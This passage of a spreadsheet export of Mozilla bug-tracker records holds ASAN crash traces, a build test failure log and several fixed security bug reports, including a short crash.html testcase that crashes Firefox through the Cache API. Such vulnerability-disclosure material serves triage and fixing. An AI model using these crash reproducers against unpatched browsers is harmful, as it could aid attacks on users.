    #14 0x7f314d423bf6 in js::SetPropertyOperation(JSContext*, unsigned char*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;) src/js/src/jsinterpinlines.h:355
    #15 0x7f314d36ed8e in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) src/js/src/jsinterp.cpp:2370
    #16 0x7f314d2caaee in js::RunScript(JSContext*, JS::Handle&lt;JSScript*&gt;, js::StackFrame*) src/js/src/jsinterp.cpp:324
    #17 0x7f314d3dd590 in js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) src/js/src/jsinterp.cpp:378
    #18 0x7f314cc39f44 in js::Invoke(JSContext*, js::InvokeArgsGuard&amp;, js::MaybeConstruct) src/js/src/jsinterp.h:109
    #19 0x7f314d3e29e0 in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) src/js/src/jsinterp.cpp:411
    #20 0x7f314cb0c356 in JS_CallFunctionValue src/js/src/jsapi.cpp:5860
    #21 0x7f313ee25356 in nsJSContext::CallEventHandler(nsISupports*, JSObject*, JSObject*, nsIArray*, nsIVariant**) src/dom/base/nsJSEnvironment.cpp:1907
    #22 0x7f313f68fc68 in nsJSEventListener::HandleEvent(nsIDOMEvent*) src/dom/src/events/nsJSEventListener.cpp:212
    #23 0x7f313da2fecb in nsEventListenerManager::HandleEventSubType(nsListenerStruct*, nsIDOMEventListener*, nsIDOMEvent*, nsIDOMEventTarget*, unsigned int, nsCxPusher*) src/content/events/src/nsEventListenerManager.cpp:845
    #24 0x7f313da31648 in nsEventListenerManager::HandleEventInternal(nsPresContext*, nsEvent*, nsIDOMEvent**, nsIDOMEventTarget*, unsigned int, nsEventStatus*, nsCxPusher*) src/content/events/src/nsEventListenerManager.cpp:918
    #25 0x7f313dbc773f in nsEventListenerManager::HandleEvent(nsPresContext*, nsEvent*, nsIDOMEvent**, nsIDOMEventTarget*, unsigned int, nsEventStatus*, nsCxPusher*) src/content/events/src/nsEventListenerManager.h:143
    #26 0x7f313dbb72de in nsEventTargetChainItem::HandleEvent(nsEventChainPostVisitor&amp;, unsigned int, bool, nsCxPusher*) src/content/events/src/nsEventDispatcher.cpp:182
    #27 0x7f313dbb5215 in nsEventTargetChainItem::HandleEventTargetChain(nsEventChainPostVisitor&amp;, unsigned int, nsDispatchingCallback*, bool, nsCxPusher*) src/content/events/src/nsEventDispatcher.cpp:313
    #28 0x7f313dbbb569 in nsEventDispatcher::Dispatch(nsISupports*, nsPresContext*, nsEvent*, nsIDOMEvent*, nsEventStatus*, nsDispatchingCallback*, nsCOMArray&lt;nsIDOMEventTarget&gt;*) src/content/events/src/nsEventDispatcher.cpp:629
    #29 0x7f313b255602 in DocumentViewerImpl::LoadComplete(tag_nsresult) src/layout/base/nsDocumentViewer.cpp:1024
previously allocated by thread T0 here:
    #0 0x4c4bb0 in __interceptor_malloc ??:0
    #1 0x7f31546bc6da in moz_xmalloc src/memory/mozalloc/mozalloc.cpp:57
    #2 0x7f313e05d2ca in operator new(unsigned long) src/../../../../dist/include/mozilla/mozalloc.h:200
    #3 0x7f313e05c040 in NS_NewHTMLInputElement(already_AddRefed&lt;nsINodeInfo&gt;, mozilla::dom::FromParser) src/content/html/content/src/nsHTMLInputElement.cpp:537
    #4 0x7f313e5e54af in CreateHTMLElement(unsigned int, already_AddRefed&lt;nsINodeInfo&gt;, mozilla::dom::FromParser) src/content/html/document/src/nsHTMLContentSink.cpp:497
    #5 0x7f313e5e5d0a in NS_NewHTMLElement(nsIContent**, already_AddRefed&lt;nsINodeInfo&gt;, mozilla::dom::FromParser) src/content/html/document/src/nsHTMLContentSink.cpp:480
    #6 0x7f313cfa66b1 in NS_NewElement(nsIContent**, already_AddRefed&lt;nsINodeInfo&gt;, mozilla::dom::FromParser) src/content/base/src/nsNameSpaceManager.cpp:201
    #7 0x7f314017055a in nsHtml5TreeOperation::Perform(nsHtml5TreeOpExecutor*, nsIContent**) src/parser/html/nsHtml5TreeOperation.cpp:340
    #8 0x7f314018fb75 in nsHtml5TreeOpExecutor::RunFlushLoop() src/parser/html/nsHtml5TreeOpExecutor.cpp:564
    #9 0x7f31401cc259 in nsHtml5ExecutorFlusher::Run() src/parser/html/nsHtml5StreamParser.cpp:127
    #10 0x7f3146b09580 in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:612
    #11 0x7f314679becb in NS_ProcessNextEvent_P(nsIThread*, bool) src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:220
    #12 0x7f31451e53b6 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) src/ipc/glue/MessagePump.cpp:82
    #13 0x7f3146dc1e11 in MessageLoop::RunInternal() src/ipc/chromium/src/base/message_loop.cc:208
    #14 0x7f3146dc1c46 in MessageLoop::RunHandler() src/ipc/chromium/src/base/message_loop.cc:201
    #15 0x7f3146dc1b2b in MessageLoop::Run() src/ipc/chromium/src/base/message_loop.cc:175
    #16 0x7f314468cdda in nsBaseAppShell::Run() src/widget/xpwidgets/nsBaseAppShell.cpp:163
    #17 0x7f31432bf9b4 in nsAppStartup::Run() src/toolkit/components/startup/nsAppStartup.cpp:290
    #18 0x7f3139932a4d in XREMain::XRE_mainRun() src/toolkit/xre/nsAppRunner.cpp:3782
    #19 0x7f31399388c5 in XREMain::XRE_main(int, char**, nsXREAppData const*) src/toolkit/xre/nsAppRunner.cpp:3848
    #20 0x7f313993b774 in XRE_main src/toolkit/xre/nsAppRunner.cpp:3923
    #21 0x40d013 in do_main(int, char**) src/browser/app/nsBrowserApp.cpp:174
    #22 0x40a755 in main src/browser/app/nsBrowserApp.cpp:279
Shadow byte and word:
  0x1fe621e41076: fd
  0x1fe621e41070: fd fd fd fd fd fd fd fd
More shadow bytes:
  0x1fe621e41050: 00 00 00 00 00 00 00 00
  0x1fe621e41058: fb fb fb fb fb fb fb fb
  0x1fe621e41060: fa fa fa fa fa fa fa fa
  0x1fe621e41068: fa fa fa fa fa fa fa fa
=&gt;0x1fe621e41070: fd fd fd fd fd fd fd fd
  0x1fe621e41078: fd fd fd fd fd fd fd fd
  0x1fe621e41080: fa fa fa fa fa fa fa fa
  0x1fe621e41088: fa fa fa fa fa fa fa fa
  0x1fe621e41090: 00 00 00 fb fb fb fb fb
Stats: 254M malloced (296M for red zones) by 516614 calls
Stats: 42M realloced by 24355 calls
Stats: 221M freed by 290089 calls
Stats: 87M really freed by 207706 calls
Stats: 484M (123993 full pages) mmaped in 121 calls
  mmaps   by size class: 8:311277; 9:32764; 10:8190; 11:14329; 12:2048; 13:1536; 14:1280; 15:384; 16:1024; 17:1248; 18:144; 19:40; 20:28;
  mallocs by size class: 8:448277; 9:33777; 10:8842; 11:17027; 12:2365; 13:1758; 14:1483; 15:342; 16:1199; 17:1317; 18:159; 19:42; 20:26;
  frees   by size class: 8:238380; 9:24927; 10:5659; 11:13922; 12:1543; 13:1467; 14:1292; 15:301; 16:1126; 17:1300; 18:110; 19:39; 20:23;
  rfrees  by size class: 8:184498; 9:8844; 10:2132; 11:9156; 12:663; 13:494; 14:464; 15:181; 16:934; 17:311; 18:24; 19:4; 20:1;
Stats: malloc large: 1544 small slow: 2450
==19969== ABORTING</t>
        </is>
      </c>
      <c r="X16" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="17">
      <c r="A17" t="n">
        <v>1609520</v>
      </c>
      <c r="B17" t="inlineStr">
        <is>
          <t>2020-01-15 12:12:01 -0800</t>
        </is>
      </c>
      <c r="C17" t="inlineStr">
        <is>
          <t>Perma [tier2] 0:43.75 python/mozbuild/mozbuild/test/configure/lint.py::Lint::test_browser TEST-UNEXPECTED-FAIL</t>
        </is>
      </c>
      <c r="D17" t="inlineStr">
        <is>
          <t>2020-01-19 22:29:18 -0800</t>
        </is>
      </c>
      <c r="E17" t="n">
        <v>1</v>
      </c>
      <c r="F17" t="n">
        <v>1</v>
      </c>
      <c r="G17" t="n">
        <v>7</v>
      </c>
      <c r="H17" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I17" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J17" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K17" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L17" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M17" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N17" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O17" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P17" t="inlineStr"/>
      <c r="Q17" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R17" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S17" t="inlineStr">
        <is>
          <t>mozilla74</t>
        </is>
      </c>
      <c r="T17" t="n">
        <v>1</v>
      </c>
      <c r="U17" t="n">
        <v>0</v>
      </c>
      <c r="V17" t="n">
        <v>7</v>
      </c>
      <c r="W17" t="inlineStr">
        <is>
          <t>**Filed by:** dvarga [at] mozilla.com
**Parsed log:** https://treeherder.mozilla.org/logviewer.html#?job_id=285084309&amp;repo=autoland
**Full log:** https://firefox-ci-tc.services.mozilla.com/api/queue/v1/task/W9GO7w4wSeCVz-CAtCoOJA/runs/0/artifacts/public/logs/live_backing.log
---
```
task 2020-01-15T18:25:11.020Z]  0:43.75 /builds/worker/checkouts/gecko/python/mozbuild/mozbuild/test/configure/lint.py
[task 2020-01-15T18:25:11.022Z]  0:43.75 ============================= test session starts ==============================
[task 2020-01-15T18:25:11.023Z]  0:43.75 platform linux2 -- Python 2.7.17, pytest-3.6.2, py-1.5.4, pluggy-0.6.0 -- /builds/worker/checkouts/gecko/obj-x86_64-pc-linux-gnu/_virtualenvs/gecko-QUm8IANb-2/bin/python
[task 2020-01-15T18:25:11.024Z]  0:43.75 rootdir: /builds/worker/checkouts/gecko, inifile: /builds/worker/checkouts/gecko/config/mozunit/mozunit/pytest.ini
[task 2020-01-15T18:25:11.026Z]  0:43.75 collecting ... collected 5 items
[task 2020-01-15T18:25:11.027Z]  0:43.75 
[task 2020-01-15T18:25:11.028Z]  0:43.75 python/mozbuild/mozbuild/test/configure/lint.py::Lint::test_browser TEST-UNEXPECTED-FAIL
[task 2020-01-15T18:25:11.030Z]  0:43.75 python/mozbuild/mozbuild/test/configure/lint.py::Lint::test_extensions PASSED
[task 2020-01-15T18:25:11.031Z]  0:43.75 python/mozbuild/mozbuild/test/configure/lint.py::Lint::test_js TEST-UNEXPECTED-FAIL
[task 2020-01-15T18:25:11.032Z]  0:43.75 python/mozbuild/mozbuild/test/configure/lint.py::Lint::test_memory PASSED
[task 2020-01-15T18:25:11.034Z]  0:43.75 python/mozbuild/mozbuild/test/configure/lint.py::Lint::test_mobile_android TEST-UNEXPECTED-FAIL
[task 2020-01-15T18:25:11.035Z]  0:43.75 
[task 2020-01-15T18:25:11.036Z]  0:43.75 =================================== FAILURES ===================================
[task 2020-01-15T18:25:11.038Z]  0:43.75 ______________________________ Lint.test_browser _______________________________
[task 2020-01-15T18:25:11.039Z]  0:43.75 
[task 2020-01-15T18:25:11.041Z]  0:43.75 self = &lt;lint.Lint testMethod=test_browser&gt;
[task 2020-01-15T18:25:11.042Z]  0:43.75 
[task 2020-01-15T18:25:11.043Z]  0:43.75     def test(self):
[task 2020-01-15T18:25:11.044Z]  0:43.75 &gt;       return func(self, project)
[task 2020-01-15T18:25:11.046Z]  0:43.75 
[task 2020-01-15T18:25:11.047Z]  0:43.75 python/mozbuild/mozbuild/test/configure/lint.py:25:
[task 2020-01-15T18:25:11.048Z]  0:43.75 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
[task 2020-01-15T18:25:11.050Z]  0:43.75 python/mozbuild/mozbuild/test/configure/lint.py:57: in lint
[task 2020-01-15T18:25:11.051Z]  0:43.75     sandbox.run(os.path.join(topsrcdir, 'moz.configure'))
[task 2020-01-15T18:25:11.052Z]  0:43.75 python/mozbuild/mozbuild/configure/lint.py:46: in run
[task 2020-01-15T18:25:11.054Z]  0:43.75     self._check_dependencies(dep)
[task 2020-01-15T18:25:11.056Z]  0:43.75 python/mozbuild/mozbuild/configure/lint.py:144: in _check_dependencies
[task 2020-01-15T18:25:11.057Z]  0:43.75     self._raise_from(e, func)
[task 2020-01-15T18:25:11.058Z]  0:43.75 python/mozbuild/mozbuild/configure/lint.py:112: in _raise_from
[task 2020-01-15T18:25:11.060Z]  0:43.75     thrower(exception)
[task 2020-01-15T18:25:11.061Z]  0:43.75 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
[task 2020-01-15T18:25:11.062Z]  0:43.75 
[task 2020-01-15T18:25:11.063Z]  0:43.75 e = ConfigureError(u'The dependency on `rustc_info` is unused',)
[task 2020-01-15T18:25:11.065Z]  0:43.75 
[task 2020-01-15T18:25:11.066Z]  0:43.75 &gt;   @depends('MOZ_PGO', '--enable-profile-use', '--enable-profile-generate',
[task 2020-01-15T18:25:11.067Z]  0:43.75              c_compiler, rustc_info)
[task 2020-01-15T18:25:11.069Z]  0:43.75     def moz_pgo_rust(pgo, profile_use, profile_generate, c_compiler, rustc):
[task 2020-01-15T18:25:11.070Z]  0:43.75 E   ConfigureError: The dependency on `rustc_info` is unused
[task 2020-01-15T18:25:11.071Z]  0:43.75 
[task 2020-01-15T18:25:11.072Z]  0:43.75 build/moz.configure/lto-pgo.configure:117: ConfigureError
```</t>
        </is>
      </c>
      <c r="X17" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="18">
      <c r="A18" t="n">
        <v>814407</v>
      </c>
      <c r="B18" t="inlineStr">
        <is>
          <t>2012-11-22 06:31:05 -0800</t>
        </is>
      </c>
      <c r="C18" t="inlineStr">
        <is>
          <t>Use after free in Mesa 8.0 after calling texImage2D on texture already attached to FBO in texture-attachment-formats.html test</t>
        </is>
      </c>
      <c r="D18" t="inlineStr">
        <is>
          <t>2014-02-28 19:50:20 -0800</t>
        </is>
      </c>
      <c r="E18" t="n">
        <v>1</v>
      </c>
      <c r="F18" t="n">
        <v>1</v>
      </c>
      <c r="G18" t="n">
        <v>3</v>
      </c>
      <c r="H18" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I18" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J18" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K18" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L18" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M18" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N18" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O18" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P18" t="inlineStr">
        <is>
          <t>[adv-main18+][adv-esr17+][qa-]</t>
        </is>
      </c>
      <c r="Q18" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R18" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S18" t="inlineStr">
        <is>
          <t>mozilla20</t>
        </is>
      </c>
      <c r="T18" t="n">
        <v>1</v>
      </c>
      <c r="U18" t="n">
        <v>0</v>
      </c>
      <c r="V18" t="n">
        <v>57</v>
      </c>
      <c r="W18" t="inlineStr">
        <is>
          <t>The WebGL conformance test now fails under fedora 18 with the latest xorg drivers and trunk Firefox on both NVDIA and AMD/ATI graphics.
I have this issue on 4 different systems crash reports and graphics info in follow-on comments.</t>
        </is>
      </c>
      <c r="X18" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="19">
      <c r="A19" t="n">
        <v>1823720</v>
      </c>
      <c r="B19" t="inlineStr">
        <is>
          <t>2023-03-21 08:40:52 -0700</t>
        </is>
      </c>
      <c r="C19" t="inlineStr">
        <is>
          <t>Obscured Fullscreen by Launching Security Credential Setup</t>
        </is>
      </c>
      <c r="D19" t="inlineStr">
        <is>
          <t>2024-06-12 05:39:38 -0700</t>
        </is>
      </c>
      <c r="E19" t="n">
        <v>1</v>
      </c>
      <c r="F19" t="n">
        <v>1</v>
      </c>
      <c r="G19" t="n">
        <v>3</v>
      </c>
      <c r="H19" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I19" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J19" t="inlineStr">
        <is>
          <t>DOM: Web Authentication</t>
        </is>
      </c>
      <c r="K19" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L19" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M19" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N19" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O19" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P19" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main119+]</t>
        </is>
      </c>
      <c r="Q19" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R19" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S19" t="inlineStr">
        <is>
          <t>119 Branch</t>
        </is>
      </c>
      <c r="T19" t="n">
        <v>1</v>
      </c>
      <c r="U19" t="n">
        <v>0</v>
      </c>
      <c r="V19" t="n">
        <v>37</v>
      </c>
      <c r="W19" t="inlineStr">
        <is>
          <t>Created attachment 9324216
spoof.html
In Firefox for Windows, launching Windows Security Credential Setup  using navigator.credentials() can obscure the fullscreen toast Text.
Steps to Reproduce:
1. Download the spoof.html file.
2. Open the spoof.html file in Firefox for Windows.
3. Click anywhere on the webpage.</t>
        </is>
      </c>
      <c r="X19" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="20">
      <c r="A20" t="n">
        <v>990794</v>
      </c>
      <c r="B20" t="inlineStr">
        <is>
          <t>2014-04-01 16:29:08 -0700</t>
        </is>
      </c>
      <c r="C20" t="inlineStr">
        <is>
          <t>heap overflow write from allocation size overflow in AllocateAudioBlock</t>
        </is>
      </c>
      <c r="D20" t="inlineStr">
        <is>
          <t>2014-07-30 04:57:40 -0700</t>
        </is>
      </c>
      <c r="E20" t="n">
        <v>1</v>
      </c>
      <c r="F20" t="n">
        <v>1</v>
      </c>
      <c r="G20" t="n">
        <v>3</v>
      </c>
      <c r="H20" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I20" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J20" t="inlineStr">
        <is>
          <t>Web Audio</t>
        </is>
      </c>
      <c r="K20" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L20" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M20" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N20" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O20" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P20" t="inlineStr">
        <is>
          <t>[adv-main29+]</t>
        </is>
      </c>
      <c r="Q20" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R20" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S20" t="inlineStr">
        <is>
          <t>mozilla31</t>
        </is>
      </c>
      <c r="T20" t="n">
        <v>1</v>
      </c>
      <c r="U20" t="n">
        <v>0</v>
      </c>
      <c r="V20" t="n">
        <v>18</v>
      </c>
      <c r="W20" t="inlineStr">
        <is>
          <t>http://hg.mozilla.org/mozilla-central/annotate/4941a2ac0786/content/media/AudioNodeEngine.cpp#l21</t>
        </is>
      </c>
      <c r="X20" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="21">
      <c r="A21" t="n">
        <v>1532553</v>
      </c>
      <c r="B21" t="inlineStr">
        <is>
          <t>2019-03-05 01:13:21 -0800</t>
        </is>
      </c>
      <c r="C21" t="inlineStr">
        <is>
          <t>Compartment mismatch in APIUnwrapAndDowncast&lt;js::ReadableStream&gt;</t>
        </is>
      </c>
      <c r="D21" t="inlineStr">
        <is>
          <t>2024-05-30 09:57:13 -0700</t>
        </is>
      </c>
      <c r="E21" t="n">
        <v>1</v>
      </c>
      <c r="F21" t="n">
        <v>1</v>
      </c>
      <c r="G21" t="n">
        <v>3</v>
      </c>
      <c r="H21" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I21" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J21" t="inlineStr">
        <is>
          <t>DOM: Service Workers</t>
        </is>
      </c>
      <c r="K21" t="inlineStr">
        <is>
          <t>67 Branch</t>
        </is>
      </c>
      <c r="L21" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M21" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N21" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O21" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P21" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main67+][adv-esr60.7+]</t>
        </is>
      </c>
      <c r="Q21" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R21" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S21" t="inlineStr">
        <is>
          <t>mozilla67</t>
        </is>
      </c>
      <c r="T21" t="n">
        <v>1</v>
      </c>
      <c r="U21" t="n">
        <v>0</v>
      </c>
      <c r="V21" t="n">
        <v>19</v>
      </c>
      <c r="W21" t="inlineStr">
        <is>
          <t>Created attachment 9048420
crash.html (minimised testcase)
The following testcase crashes the latest ASAN build of Firefox 67.0a1 (SourceStamp=c59f0f40e0f6995c2bf70499e783afc7626cab96). It requires to be served from a localhost http server.
crash.html:
&lt;script&gt;
function start() {
    o16=window.open('data:image/svg%2bxml,%3Csvg%3e');
    o304=o16.caches;
    o305=o304.open('c2');
    o305.then(fun0);
}
function fun0(o340) {
    o663=new Response('x');
    o663.body;
    o841=new Request('x');
    o340.put(o841,o663);
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
AddressSanitizer:DEADLYSIGNAL
=================================================================
==24009==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000001 (pc 0x563e39c30581 bp 0x7ffe45414eb0 sp 0x7ffe45414eb0 T0)
==24009==The signal is caused by a WRITE memory access.
==24009==Hint: address points to the zero page.
    #0 0x563e39c30580 in MOZ_Crash(char const*, int, char const*) /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/Assertions.h:314:3
    #1 0x563e39c3048d in MOZ_CrashPrintf /builds/worker/workspace/build/src/mfbt/Assertions.cpp:55:3
    #2 0x7f0e211519ae in fail /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:43:5
    #3 0x7f0e211519ae in check /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:59
    #4 0x7f0e211519ae in check /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:73
    #5 0x7f0e211519ae in checkImpl&lt;JSObject *&gt; /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:184
    #6 0x7f0e211519ae in check&lt;JSObject *&gt; /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:192
    #7 0x7f0e211519ae in APIUnwrapAndDowncast&lt;js::ReadableStream&gt; /builds/worker/workspace/build/src/js/src/builtin/Stream.cpp:4495
    #8 0x7f0e211519ae in JS::ReadableStreamGetMode(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::ReadableStreamMode*) /builds/worker/workspace/build/src/js/src/builtin/Stream.cpp:4558
    #9 0x7f0e19c9c964 in mozilla::dom::FetchBody&lt;mozilla::dom::Response&gt;::SetBodyUsed(JSContext*, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/fetch/Fetch.cpp:1072:10
    #10 0x7f0e19477747 in mozilla::dom::cache::TypeUtils::ToCacheResponse(JSContext*, mozilla::dom::cache::CacheResponse&amp;, mozilla::dom::Response&amp;, nsTArray&lt;mozilla::UniquePtr&lt;mozilla::ipc::AutoIPCStream, mozilla::DefaultDelete&lt;mozilla::ipc::AutoIPCStream&gt; &gt; &gt;&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/cache/TypeUtils.cpp:225:9
    #11 0x7f0e193db496 in mozilla::dom::cache::AutoChildOpArgs::Add(JSContext*, mozilla::dom::InternalRequest*, mozilla::dom::cache::TypeUtils::BodyAction, mozilla::dom::cache::TypeUtils::SchemeAction, mozilla::dom::Response&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/cache/AutoUtils.cpp:306:21
    #12 0x7f0e193e6d6f in mozilla::dom::cache::Cache::Put(JSContext*, mozilla::dom::RequestOrUSVString const&amp;, mozilla::dom::Response&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/cache/Cache.cpp:420:8
    #13 0x7f0e17af708c in put /builds/worker/workspace/build/src/obj-firefox/dom/bindings/CacheBinding.cpp:915:45
    #14 0x7f0e17af708c in mozilla::dom::Cache_Binding::put_promiseWrapper(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::cache::Cache*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/CacheBinding.cpp:931
    #15 0x7f0e19388255 in bool mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ConvertExceptionsToPromises&gt;(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3144:13
    #16 0x7f0e209e6f97 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:440:13
    #17 0x7f0e209e6f97 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:532
    #18 0x7f0e209e9552 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:603:8
    #19 0x7f0e216a35e1 in js::ForwardingProxyHandler::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /builds/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:162:10
    #20 0x7f0e2165c4b1 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /builds/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:238:19
    #21 0x7f0e21681d90 in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:503:19
    #22 0x7f0e209e7fe9 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:506:14
    #23 0x7f0e209ced3f in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:591:10
    #24 0x7f0e209ced3f in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3055
    #25 0x7f0e209b19b8 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:420:10
    #26 0x7f0e209e7906 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:560:13
    #27 0x7f0e209e9552 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:603:8
    #28 0x7f0e216a35e1 in js::ForwardingProxyHandler::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /builds/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:162:10
    #29 0x7f0e2165c4b1 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /builds/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:238:19
    #30 0x7f0e21681d90 in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:503:19
    #31 0x7f0e209e7fe9 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:506:14
